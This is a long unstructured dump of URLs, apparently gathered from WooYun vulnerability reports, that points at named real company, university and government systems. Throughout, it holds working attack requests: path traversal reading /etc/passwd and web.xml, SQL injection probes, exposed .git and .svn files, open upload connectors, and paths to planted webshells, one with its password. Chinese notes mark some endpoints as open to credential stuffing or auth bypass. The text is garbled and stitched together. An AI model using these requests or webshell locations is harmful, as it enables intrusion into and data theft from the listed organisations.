http://**.**.**.**/easyscan/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://oa.tianya.cn/wui/theme/ecology7/page/login.jsp?templateId=6&logintype=1&gopage=&message=17 http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001 http://oa.airchinapm.com:2001/yyoa/index.jsp http://oa.tianya.cn/messager/users.data http://oa.tianya.cn/wui/theme/ecology7/page/login.jsp http://beijing.daojia.com.cn/?city=1 http://wx.mojichina.com/.svn/entries http://vpn.mojichina.com/.svn/entries http://admin.1jiajie.com/v2/index.php?action=login http://login.meitu.com/这个好像就是主站的登录位置哦,发现没有登录限制,然后抓包用户名和密码都是明文传输的 http://e.o2obest.cn/api/comment/commentapplist http://**.**.**.**/default.asp http://**.**.**.**/admin/login.asp http://m.rrs.com/snaplb/FAQ/listByNum.ajax http://my.iciba.com/此处接口无验证码无登录限制的,用户名密码均明文传输的可撞库网站用户 http://c.open.163.com/.git/config http://www.lvmama.com/zt/promo/zhaomu/ http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://mail.91160.com/ http://store.rrs.com/nearStore/ajaxJsp/experience_store.jsp?area_id=1&postType=getStorePage&pageNo=0 http://store.rrs.com/nearStore/ajaxJsp/experience_store.jsp?pid=1&postType=getRegion http://fws.rrs.com/ http://fws.rrs.com/login_reset http://beijing.daojia.com.cn/appraisedaojia.php http://www.union-ins.cn/regist http://www.union-ins.cn/getBackPassword http://**.**.**.**/about/index.asp?id=1 http://**.**.**.**/pages/GCS/news_main.aspx?ID=273&tv=001 http://**.**.**.**:8086/gdlisweb/MagazineCantoRequest.aspx 
http://**.**.**.**:82/netweb/MagazineCantoRequest.aspx http://**.**.**.**/MagazineCantoRequest.aspx http://new.sqgf.com/auth/signin.jsp http://**.**.**.**/bugs/wooyun-2010-0137042 http://**.**.**.**:9085//document/imp/filebrowser.jsp?dir=D:\\ http://www.**.**.**.**/bugs/wooyun-2015-0124027 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://www.health.taikang.com/sbt/indexlis.jsp http://www.health.taikang.com/sbt/common/cvar/CExec.jsp http://202.115.194.51/Admin/Default.aspx https://**.**.**.**/node/stock-market/plaza/sell?user_id=115153 http://pols.ecnu.edu.cn http://pols.ecnu.edu.cn/admin/admin.php http://118.26.192.92 server:3TOM2***********x http://**.**.**.**/archives/detail_userlist.php?jb=1&urlcode=%E6%88%90%E9%83%BD%E5%8F%A4%E5%BE%81%E6%88%BF%E5%9C%B0%E4%BA%A7%E7%BB%8F%E7%BA%AA%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 http://**.**.**.**/archives/detail_userlist.php?jb=1&urlcode=%E6%88%90%E9%83%BD%E5%8F%A4%E5%BE%81%E6%88%BF%E5%9C%B0%E4%BA%A7%E7%BB%8F%E7%BA%AA%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 https://github.com/fbwfbi/Some_work_scripts/blob/13493395bd8c6ed5dba079bd6ec9dc2151afab26/mailsend.sh www1.daojia.com.cn http://idm2.tcl.com/WebConsole/login/login.jsp http://idm2.tcl.com:8088/manager/html http://idm2.tcl.com:8088/anjiePrjbak/ http://idm2.tcl.com:8088/webdaxp/ http://idm2.tcl.com:8088/webdoc/ http://www.lagou.com/gongsi/j92011.html http://myou.erp.shopware.cn http://m.xin.com/ http://**.**.**.**/Default.aspx http://**.**.**.**/Default.aspx http://**.**.**.**/phpmyadmin/ http://jikao17.open.com.cn/matriculationonline/login.asp http://jikao17.open.com.cn/matriculationonline/ http://******.xinnet.com/account/login http://www.sinnet.com.cn/UserFiles/ 
http://**.**.**.**/index.asp http://**.**.**.**/lecture.asp http://**.**.**.**/gzyq/admin/Details_Data.asp?id=46501 http://**.**.**.**:88/PreciousE/admin/Details_Data.asp?id=46501 http://**.**.**.**/pe/admin/Details_Data.asp?id=46501 http://**.**.**.**/gzyq/admin/Booking_State.asp?id=46501 http://**.**.**.**:88/PreciousE/admin/Booking_State.asp?id=46501 http://**.**.**.**/pe/admin/Booking_State.asp?id=46501 http://**.**.**.**/gzyq/admin/EnterUI.asp?id=206 http://**.**.**.**:88/PreciousE/admin/EnterUI.asp?id=206 http://**.**.**.**/pe/admin/EnterUI.asp?id=206 http://**.**.**.**/gzyq/admin/EnterUI_Syjl.asp?id=169724 http://**.**.**.**:88/PreciousE/admin/EnterUI_Syjl.asp?id=169724 http://**.**.**.**/pe/admin/EnterUI_Syjl.asp?id=169724 http://**.**.**.**/gzyq/admin/EnterUI_del.asp?ID=12&file=Used_Auditing.asp http://**.**.**.**:88/PreciousE/admin/EnterUI_del.asp?ID=12&file=Used_Auditing.asp http://**.**.**.**/pe/admin/EnterUI_del.asp?ID=12&file=Used_Auditing.asp http://**.**.**.**/gzyq/admin/EnterUI_XG.asp?id=206 http://**.**.**.**:88/PreciousE/admin/EnterUI_XG.asp?id=206 http://**.**.**.**/pe/admin/EnterUI_XG.asp?id=206 http://**.**.**.**/gzyq/common/sort.asp?condition=+where+%B4%FA%C2%EB%C3%FB%B3%C6+like++%27%251%25%27&str=&columns1=%B4%FA%C2%EB%C3%FB%B3%C6&connect=like&columns1_value=1&numrecord=25 http://**.**.**.**:88/PreciousE/common/sort.asp?condition=+where+%B4%FA%C2%EB%C3%FB%B3%C6+like++%27%251%25%27&str=&columns1=%B4%FA%C2%EB%C3%FB%B3%C6&connect=like&columns1_value=1&numrecord=25 http://**.**.**.**/pe/common/sort.asp?condition=+where+%B4%FA%C2%EB%C3%FB%B3%C6+like++%27%251%25%27&str=&columns1=%B4%FA%C2%EB%C3%FB%B3%C6&connect=like&columns1_value=1&numrecord=25 http://**.**.**.**/onews.asp?id=23 https://i.wkzq.com.cn/ https://i.wkzq.com.cn/page/common/download/down.down?f=../WEB-INF/web.xml http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw 
http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11 http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11 http://**.**.**.**/company_detail.php?id=1 http://**.**.**.**/company_detail.php?id=1 http://**.**.**.**/admin/_login.php http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=6&pid=ScGsc-App-2008-140&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=6&pid=ScGsc-App-2008-153&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=6&pid=ScGsc-App-2008-140&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=6&pid=ScGsc-App-2008-153&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 
http://**.**.**.**/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=6&pid=ScGsc-App-2008-140&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/tiaojian?st=6&pid=ScGsc-App-2008-153&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/tiaojian?st=6&pid=ScGsc-App-2008-153&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 https://211.144.131.98:9043/ibm/console/ http://211.144.131.98:9080/safe_test/index.jsp http://dealer.xin.com/apply_dealer/get_city_all/ http://webchat.cpic.com.cn:9090 http://webchat.cpic.com.cn:9090/webcall_chat/leaveMessage.jsp http://mobile.taikang.com/tkmobile/service/ServiceInfoServlet?function_code=querymfinsurewn&mfinsure=M&sign=undefined http://**.**.**.**/nos/speedtest/saveuserinfo.jsp?account= http://hyzc.91huayi.com/secure/login.aspx http://www.xin.com/app/ https://github.com/songxin1990/logsys/blob/master/src/main/resources/log4j.properties http://113.108.48.22:7890/oa http://oa.hrsec.com.cn/messager/users.data http://post.8684.cn http://member.ly.com/Member/MemberInfomation.aspx jdbc:oracle:thin:@**.**.**.**:1521:orcl 
http://**.**.**.**/Index.action cn:6379 http://www.zyql.cn/ www.zyql.cn com:6379 http://webchat.cpic.com.cn:9090 http://webchat.cpic.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ com:6379 jdbc:oracle:thin:@**.**.**.**:1521:orcl http://mail.minanins.com:9001/console/login/LoginForm.jsp http://**.**.**.**/ encap:Ethernet B1:1C:35:71:ED fe35:71ed/64 Scope:Link MTU:1500 packets:9085358280 packets:6694570843 txqueuelen:1000 http://58.213.14.165:89存在SQL注入 http://**.**.**.**/message/detail.asp?msgID=284 http://**.**.**.**/news/index.php?mode=data&id=15434 http://**.**.**.**/news/index.php?mode=data&id=15434 http://b.daojia.com.cn/ http://**.**.**.**/,注册一个测试账号~ http://**.**.**.**/ http://**.**.**.**:80/PassAccount/GetUserPass?email=31610165**@**.**.**.**&id=88975&phone=&code=SJgz http://**.**.**.**:7000/inform/frontsub/infoInput_specialOpen.action?type=2存在命令执行漏洞 http://www.snowbeerah.com/ http://www.snowbeerah.com/uploadfiles/2015/10/20151024101605165.aspx密码wooyun http://mp.youku.com/user/userinfo http://mp.youku.com/passport/index?domain=youku https://oa.xin.com/weaver/weaver.email.FileDownloadLo http://103.47.87.72:7001/otcwms http://103.47.87.72:7001/console/login/LoginForm.jsp http://103.47.87.72:7001/ma/ma1.jsp http://buzz.hiiir.com:80/ http://cme.91huayi.com/secure/login.aspx http://cme.91huayi.com/secure/login.aspx http://**.**.**.**//jxpj/xbcx_Login.asp http://**.**.**.**/jxpj/xbcx_Login.asp http://**.**.**.**/jxpj/xbcx_Login.asp http://**.**.**.**:86/jxpj/xbcx_Login.asp http://**.**.**.**/jxpj/xbcx_Login.asp http://**.**.**.**:86/jxpj/xbcx_Login.asp http://buzz.hiiir.com:80/ http://**.**.**.**:888/yyoa/ http://**.**.**.**:888/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://**.**.**.**:888/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20load_file http://**.**.**.**/fcc/activityDetail.do?eventid=168 http://**.**.**.**/ http://**.**.**.**/ 
http://**.**.**.**/ http://**.**.**.**:86/ http://**.**.**.**/ http://**.**.**.**:86/ http://**.**.**.**//cjsr/gx_cjsr_login.asp http://**.**.**.**/cjsr/cjsr_login.asp http://**.**.**.**/jsxgmm.asp http://**.**.**.**/jxpj/pj_xscpqk.asp http://**.**.**.**:8085/servlet/vodsys.nameCheck http://daren.sc.weibo.com/h5/front/search http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=1%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522 http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=2%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522 https://**.**.**.**/yanhom1314/chengdusifaju http://**.**.**.** http://cconline.southernfund.com:9898/ http://cconline.southernfund.com:9898/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File com:9898 http://cconline.southernfund.com:9898 www2.daojia.com.cn www2.daojia.com.cn http://ifs.swufe.edu.cn/ http://ifs.swufe.edu.cn/index.php?go=admin https://**.**.**.**/niujie123/myself/blob/3a705e4c7f706a7bcc3f4668bf391582136cba89/include/config/main.php http://**.**.**.** http://**.**.**.**:8080/boms3/aicf/loginForm.action http://spin.neusoft.com/xoops/ https://portal.neusoft.com/dana-na/auth/url_default/welcome.cgi http://**.**.**.**:8081 http://121.34.249.232:8080/ http://z.dangdang.com/project/add http://bbs.ihoms.com http://webcall.airchina.com.cn:9090/webstat/ucstarclient_webcall/client/ucallclient_1.jsp http://webcall.airchina.com.cn:9090/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File cn:9090 http://webcall.airchina.com.cn:9090 http://111.13.46.70:8020/index.php/Index/Basic/contacts.html http://www.wkzq.com.cn/wkzq/web/index.aspx https://i.wkzq.com.cn/down.down?f=20150922044304523.exe https://i.wkzq.com.cn/down.down?f=../WEB-INF/web.xml http://tm.ename.net/tm/download?AId=1 http://tm.ename.net/tm/download?AId=2 http://tm.ename.net/tm/download?AId=3 http://tm.ename.net/tm/download?AId=4 
http://down.mobilesoftstore.com:8080/soft/1/chaojizhongduanzhuanyeban_7942_20121001.apk","date":"2015-10-08 http://www.gzxijiu.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.gzxijiu.cn:8080/yyoa/checkWaitdo.jsp?userID=1 http://www.gzxijiu.cn:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://www.gzxijiu.cn:8080/yyoa/assess/js/initDataAssess.jsp http://www.gzxijiu.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.gzxijiu.cn:8080/yyoa/common/SelectPerson/reloadData.jsp http://www.gzxijiu.cn:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://www.gzsz.com.cn:888/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://116.58.222.75/index.jsp http://ota.shendu.com/api.php?mod[]=111 http://**.**.**.**/UploadFile/Index/ shell:http://**.**.**.**/updown\1510\24200659.cer http://**.**.**.**/updown/1510/24201717.cer http://**.**.**.**//upload/doc/201510/24204744.cer http://**.**.**.**//upload/doc/201510/24204744.cer filetype:xls http://**.**.**.**/shgb_bm/ http://tee.sports.sohu.com http://www.yasabake.com旁站存在注射 http://**.**.**.**/search.aspx?q= http://**.**.**.**/sipicabgov/web/CheckBooking/AddBookingStep1.aspx http://**.**.**.**/english/index.php?content=teacher_person&id=13 http://**.**.**.**/english/index.php?content=teacher_person&id=13 http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96 http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96 http://admin-safeurl.maxthon.cn/admin.php?c=index&a=run http://**.**.**.**/cn/newsshow.php?id=7 http://**.**.**.**/guest/index.action http://**.**.**.**/ http://**.**.**.**/html/p/p_13/p_13.html inurl:cms/leadermail http://**.**.**.**/fsmcms/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/ucms/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/pharm/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/fsmcms/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/fsmcms/cms/leadermail/p_lettersearch.jsp 
http://**.**.**.**/bugs/wooyun-2010-099627 http://moa.glsc.com.cn:8001/homepage.action http://portal.sicnu.edu.cn:82/cas/login?service=http://portal.sicnu.edu.cn/cas.jsp http://**.**.**.**/bugs/wooyun-2015-0122763 http://**.**.**.**/doc/data/document.mdb http://0.plu.cn:9200/_river/_search http://01mistery.plu.cn:9200/_river/_search http://00o00.plu.cn:9200/_river/_search http://01.plu.cn:9200/_river/_search http://0755-oopp.plu.cn:9200/_river/_search http://007.plu.cn:9200/_river/_search www.mbaobao.com-sg=GHACAHAKFAAA http://ess.cninsure.net/product/logon/Login.jsp http://ess.cninsure.net/product/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://ssci.whut.edu.cn http://www.chake.net/Login.aspx http://math.whut.edu.cn/math_web/partII.asp?big_part=-1 http://im.dhzq.com.cn:9090/ http://im.dhzq.com.cn:9090/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File http://im.dhzq.com.cn:9090 http://shippingtool.ebay.com.hk/Help/HelpDetail.html?typeid=e6d68975d8&type1id=0b9533376c&id=28b1eefbf4 http://shippingtool.ebay.cn/Help/HelpDetail.html?typeid=e6d68975d8&type1id=0b9533376c&id=28b1eefbf4 commentdoc.php/1*/100/1/2/0 http://b.daojia.com.cn/service.php?action=2147483649&uid=1445698756644&user=e http://**.**.**.**/product/more.asp?bigclassid=27 http://**.**.**.**/culture/index.asp?id=5 http://**.**.**.**/ http://oa.glsc.com.cn:10040/wps/portal/ http://oa.glsc.com.cn:10040/glzqehr/personBase.do?method=Df_openLicense&licenseName=D:\\archivefile\\zhaopian\202.jpg http://oa.glsc.com.cn:10040/glzqehr/personBase.do?method=Df_openLicense&licenseName=D:\\archivefile\\zhaopian\202.jpg http://oa.glsc.com.cn:10040/glzqehr/main.do http://**.**.**.**/ksjs/ksjs-detel.asp?leibieid2=0&leibieid=3*&id=101 http://**.**.**.**/1999/xhtml http://demo.oa8000.com/htoa/temp/2.jsp会跳转到登录界面,虽然不清楚做了什么设置,但是多加几个斜杠轻松就绕过了http://demo.oa8000.com////htoa///temp////2.jsp http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 
http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/ETD-search-c/view_etd?URN=etd-0723108-213849 http://**.**.**.**/ETD-search-c/view_etd?URN=etd-0723108-213849 http://**.**.**.**/volunteers/show_vhuodong.aspx?Vid=18803 http://**.**.**.**/ETD-db/ETD-search-c/view_etd?URN=etd-0626106-123109 http://**.**.**.**/ETD-db/ETD-search-c/view_etd?URN=etd-0626106-123109 http://**.**.**.**/ http://glsc.cobo.cn/portal/org/FindPassword/BO.cobo http://glsc.cobo.cn/portal/org/SelfRegister.cobo http://data.5i5j.com/sitemetrics.zip http://data.5i5j.com/sitemetrics/.svn/entries http://**.**.**.**/bugs/wooyun-2015-0132763 http://**.**.**.**/info_recordview.aspx?bbid=3 http://**.**.**.**/gdweb/info_recordview.aspx?bbid=3 http://**.**.**.**:8001/info_recordview.aspx?bbid=3 https://**.**.**.**/cway/DataCenter/blob/785a35862cc96e46cfc996a90440d61e197cc246/conf/application.ini http://**.**.**.**/BrandAdmin/login http://**.**.**.**/api/third_party_api/wifi_key/get https://github.com/oconnorendure/dwcenter/blob/e4b79a7f31ddea1fc20cfb078f22a7f663227357/src/main/conf/prd/systemConfig.properties http://i0.ule.com http://112.74.65.190:9001/ELearning/Login.do http://112.74.65.190:9001/console shell:http://112.74.65.190:9001/ca/ma3.jsp www.yangtianclub.com http://www.yangtianclub.com/ http://b.daojia.com.cn/ http://b.daojia.com.cn/index.php?action=2147483650 http://**.**.**.**/bugs/wooyun-2010-073346这个,对此系统再次进行检测,发现还有一处漏洞!!! 
http://**.**.**.**/admin/update.do?content=1125574332093&updateType=xwxxStore http://**.**.**.**/update.do?content=1125574332093&updateType=xwxxStore http://**.**.**.**/update.do?content=1125574332093&updateType=xwxxStore http://www.dkf88.com/ http://**.**.**.**/dan_title.php?type=10 http://www.zs6y.com:80/ www.zs6y.com http://**.**.**.**/noi2013.sql https://**.**.**.**/fishcy521/tdd_test/blob/cb00ec08f2137c9c27ca9da30c3a3631e8e360f5/tdd-rms/src/main/java/com/rms/commons/dbcp/EmailFactory.java http://**.**.**.**/whir_system/ http://**.**.**.**/uploadfiles/2015/10/201510251539563956.aspx http://**.**.**.**/news_content.asp?ID=12网址如上。 http://www.weimeng.net/ https://github.com/Nifury/Derivative/blob/7858a8e3b0366eeeff7e5417af9657ba26d1ca45/src/main/java/bl/ServiceImpl.java http://**.**.**.**/external4GMS/detailZC?flotNo=ZCBX2015090100000000312235700176 http://**.**.**.**/Html/Default.html http://**.**.**.**/SheYingPhotoContent.aspx?photoid=2012013016324000001 http://**.**.**.**/Ashx/Base/GetCompany.ashx?city= http://**.**.**.**/customer/hite_20110815/energy_details.asp?id=2011090517235600003 http://**.**.**.**/customer/rockwell/com-detail.asp?id=2936 http://**.**.**.**/customer/photo/zpzs_hy_list.Asp?industryid=2012071311541500002 http://**.**.**.**/customer/photo/hjzp_user_detail.asp?Id=10926 http://api.ycapp.yiche.com/Car/GetCarStylePropertys http://**.**.**.**/wsbs/wsbs.do?method=SdeptServ&coumnId=4028808b41484a02014148879d620007&flag=1 http://**.**.**.**/szfgsweb/wsbs/wsbs.do?method=SdeptServ&coumnId=402880023d5d08bd013d5d2feba50001&flag=1 http://**.**.**.**/lbweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414550400141455caa8c0000&flag=1 http://**.**.**.**/wsbs/wsbs.do?method=SdeptServ&coumnId=4028808b41484a02014148879d620007&flag=1 http://**.**.**.**/qinanweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40289e053de84f17013de88182370004&flag=1 http://**.**.**.**/wsbs/wsbs.do?method=SdeptServ&coumnId=402880023d5d08bd013d5d2feba50001&flag=1 
http://**.**.**.**/kqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/weichengweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/qsqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/tyqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/byqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/sgqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/xyweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414550400141455caa8c0000&flag=1 http://**.**.**.**/dmqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://182.48.115.130:7001/maximo/webclient/login/login.jsp http://182.48.115.130:7001/console/login/LoginForm.jsp http://182.48.115.130:7001/ma/ma3.jsp?o=index http://182.48.115.130:7001/ma/out.jsp http://info.swufe.edu.cn/vlc/?id=1'%22&wall=1 http://doogua.dangdang.com/auth/res/list http://182.254.162.32:7001/etrading/ http://182.254.162.32:7001/console/login/LoginForm.jsp http://182.254.162.32:7001/ma/ma3.jsp jdbc:oracle:thin:@10.232.6.108:1522/ODSDB http://**.**.**.**/ http://**.**.**.**/upload/JF.jsp site:ecnu.edu.cn http://itil.ecnu.edu.cn/itsm/register.do http://itil.ecnu.edu.cn/itsm/index-withoutCA.jsp http://itil.ecnu.edu.cn/itsm/ssd/self_servicedesk.do?method=enter&menuId=m1&processName=%8B%F6&processKey=INC http://itil.ecnu.edu.cn/itsm/ssd/ http://mail2.glsc.com.cn:8084/ http://founder.hiall.com.cn/.git/config http://service.homelink.com.cn/wct/businesscard/personalCard/editPersonalCard?cardId=8***&openId=o****meuRvAepRTTdf1PWBKrQ http://service.homelink.com.cn/wct/businesscard/personalCard/toIndex?code=001a9a0f7e9******b9ea5a1df9590eP&state=201 http://service.homelink.com.cn/wct/userfiles/agent/pressImages/2015101336181.jsp 
jdbc:mysql://172.27.30.234:3306/***?useUnicode=true&characterEncoding=utf-8 http://vip.changyou.com/.svn/entries http://**.**.**.**/list.php http://**.**.**.**/ggfwzx_news_list.aspx?id=2&type=list&page=1 http://www.vc265.com/site/calendardata https://github.com/liuchaox/welab_bi/blob/95e027b34b0b2845c0db3e1bd767d99d1a9631a6/etl/src/kettle/kettle.properties http://url/fckeditor/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://url/fckeditor/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F http://**.**.**.**:9090/xmghSearch/detail.jsp?docid=120 http://**.**.**.**/volunteers/ShowPage.aspx?newsid=9938 http://**.**.**.**/index.php?controller=Articles&action=View&aid=85 http://ess.cninsure.net/portal/product/get_product_list!searchRiskList.action http://interface.api.haodai.com/bapi/TaoOrder/getOrderInfo?os_type=1&appid=1&imei=A0000038518D0C&app_version=28601&auth_tms=20151025220511&auth_did=74590&auth_dsig=66151c927a881a2c&auth_uid=230822&auth_usig=22d4c61c657d2cbb http://**.**.**.**/ http://wooyun.org/bugs/wooyun-2015-0147641 http://221.239.120.208/uddiexplorer/ http://221.239.120.202/uddiexplorer/ https://**.**.**.** http://**.**.**.**/2013/about/lxwm.aspx留言内容处插入XSS语句,等待上钩 http://gopurchase.haier.com/GOPurchase/Common/C http://mail.soufun.com/ http://**.**.**.**/iframe.html https://**.**.**.** https://**.**.**.** https://**.**.**.** https://**.**.**.** http://alwayson.hp.com.cn/AAS http://**.**.**.**/bugs/wooyun-2010-0149063/trace/40ed46c3b88cb092d7c80e7389daa673 http://**.**.**.**/index.php http://**.**.**.**/blog.php?id=1506 http://**.**.**.**/blog.php?id=1506 http://**.**.**.**/blog.php?id=1506 http://**.**.**.**/blog.php?id=1506 http://**.**.**.**/blog.php?id=1506 http://**.**.**.**:80/webserver/magazine.aspx?callback=jQuery15102822848288756544_1444642806752&Type=getmagazine&page=4&_=1444642807392&mname=1 
http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/articlelist.asp?page=1&special=%C8%FD%D0%A1%BB%FA%C6%F7%C8%CB%C9%E7%CD%C5 http://**.**.**.**/aboutus/webnewslist3.asp?typeid=30 http://weixin.hazq.com/codeadm/ http://**.**.**.**/bugs/wooyun-2015-0120901 http://**.**.**.**/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 http://**.**.**.**/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 http://**.**.**.**/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 http://**.**.**.**:8080/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 http://**.**.**.**:8080/dlib/BookVisit.asp?BOOKTYPE=1&BOOKID=59588 https://online.yeepay.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://**.**.**.**/bugs/wooyun-2015-0147705 